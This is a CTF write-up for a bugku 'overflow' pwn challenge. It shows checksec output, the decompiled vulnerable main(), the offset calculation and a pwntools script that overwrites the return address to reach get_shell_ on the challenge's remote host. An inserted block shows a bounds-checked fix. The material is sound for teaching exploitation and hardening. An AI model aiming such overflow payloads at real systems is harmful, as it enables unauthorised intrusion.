[CTF problem series] bugku pwn challenges

overflow

checksec check

[root@ningan 01-overflow]# checksec pwn2
[!] Could not populate PLT: future feature annotations is not defined (unicorn.py, line 2)
[*] '/root/ctf/bugku/01-overflow/pwn2'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX disabled
PIE: No PIE (0x400000)
RWX: Has RWX segments
[root@ningan 01-overflow]#

IDA analysis

int __cdecl main(int argc, const char **argv, const char **envp)
{
char s[48]; // [rsp+0h] [rbp-30h] BYREF

memset(s, 0, sizeof(s));
setvbuf(stdout, 0LL, 2, 0LL);
setvbuf(stdin, 0LL, 1, 0LL);
puts("say something?");
read(0, s, 0x100uLL);
puts("oh,that's so boring!");
return 0;
}
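The fix a defender would want for the main() above, added here as an example and not code from the challenge binary: read(0, s, 0x100) into a 48-byte s becomes a read capped at sizeof(s)-1 with NUL termination, so no input length can reach the saved rbp or return address. bounded_read and demo_bounded are hypothetical names, and demo_bounded pushes constructed input through a pipe standing in for stdin; rebuilding with -fstack-protector-strong and -z noexecstack would also restore the canary and NX that checksec reported missing.

```c
#include <stdio.h>
#include <string.h>
#include <unistd.h>

#define BUF_LEN 48  /* same size as `s` in the decompiled main() */

/* Hardened replacement for read(0, s, 0x100): never store more than
 * cap-1 bytes and always NUL-terminate. Returns bytes stored, -1 on error. */
ssize_t bounded_read(int fd, char *dst, size_t cap)
{
    if (cap == 0) return -1;
    ssize_t n = read(fd, dst, cap - 1);
    if (n < 0) {
        dst[0] = '\0';
        return -1;
    }
    dst[n] = '\0';
    return n;
}

/* Hypothetical harness: push input_len bytes of 'A' (constructed input,
 * capped at the 0x100 the original read() accepted) through a pipe that
 * stands in for stdin, then read into a 48-byte stack buffer as main() does.
 * Returns how many bytes actually landed in the buffer. */
ssize_t demo_bounded(size_t input_len)
{
    int fds[2];
    char junk[0x100];
    char s[BUF_LEN];
    if (pipe(fds) != 0)
        return -1;
    memset(junk, 'A', sizeof junk);
    if (input_len > sizeof junk) input_len = sizeof junk;
    /* a single write below the pipe capacity does not block */
    if (write(fds[1], junk, input_len) != (ssize_t)input_len) {
        close(fds[0]); close(fds[1]);
        return -1;
    }
    close(fds[1]);
    ssize_t stored = bounded_read(fds[0], s, sizeof s);
    close(fds[0]);
    return stored;   /* 0x100 bytes offered -> 47 stored, never past s[47] */
}

int main(void)
{
    printf("0x100 bytes offered, %zd stored\n", demo_bounded(0x100));
    return 0;
}
```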


int get_shell_()
{
puts("tql~tql~tql~tql~tql~tql~tql");
puts("this is your flag!");
return system("cat flag");
}

IDA analysis: find the function address

(screenshot: IDA function list)

gdb analysis: find the offset

(screenshots: gdb session)

[root@ningan 01-overflow]# python
Python 3.6.9 (default, Mar 10 2023, 16:46:00)
[GCC 8.4.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> 0x1a0 - 0x170
48


exp

[root@ningan 01-overflow]# cat exp.py

from pwn import *

#io = process("./pwn2")
io = remote("114.67.175.224", 18554)

context.arch = "amd64"
# 48-byte buffer s, then the 8-byte saved rbp, then the return address -> get_shell_
payload = b'A' * 48 + b'BBBBBBBB' + p64(0x0000000000400751)

io.recvline()        # "say something?"
# io.recvline()
io.sendline(payload)
io.interactive()

Final result

[root@ningan 01-overflow]# python exp.py
[+] Opening connection to 114.67.175.224 on port 18554: Done
[*] Switching to interactive mode
oh,that's so boring!
tql~tql~tql~tql~tql~tql~tql
this is your flag!
flag{99kls08s6d5a73bcd}
[*] Got EOF while reading in interactive
$
$
[*] Closed connection to 114.67.175.224 port 18554
[*] Got EOF while sending in interactive


http://example.com/2023/08/16/ctf/【ctf题目系列】bugku pwn类型/
Author
ningan123
Published on
August 16, 2023
License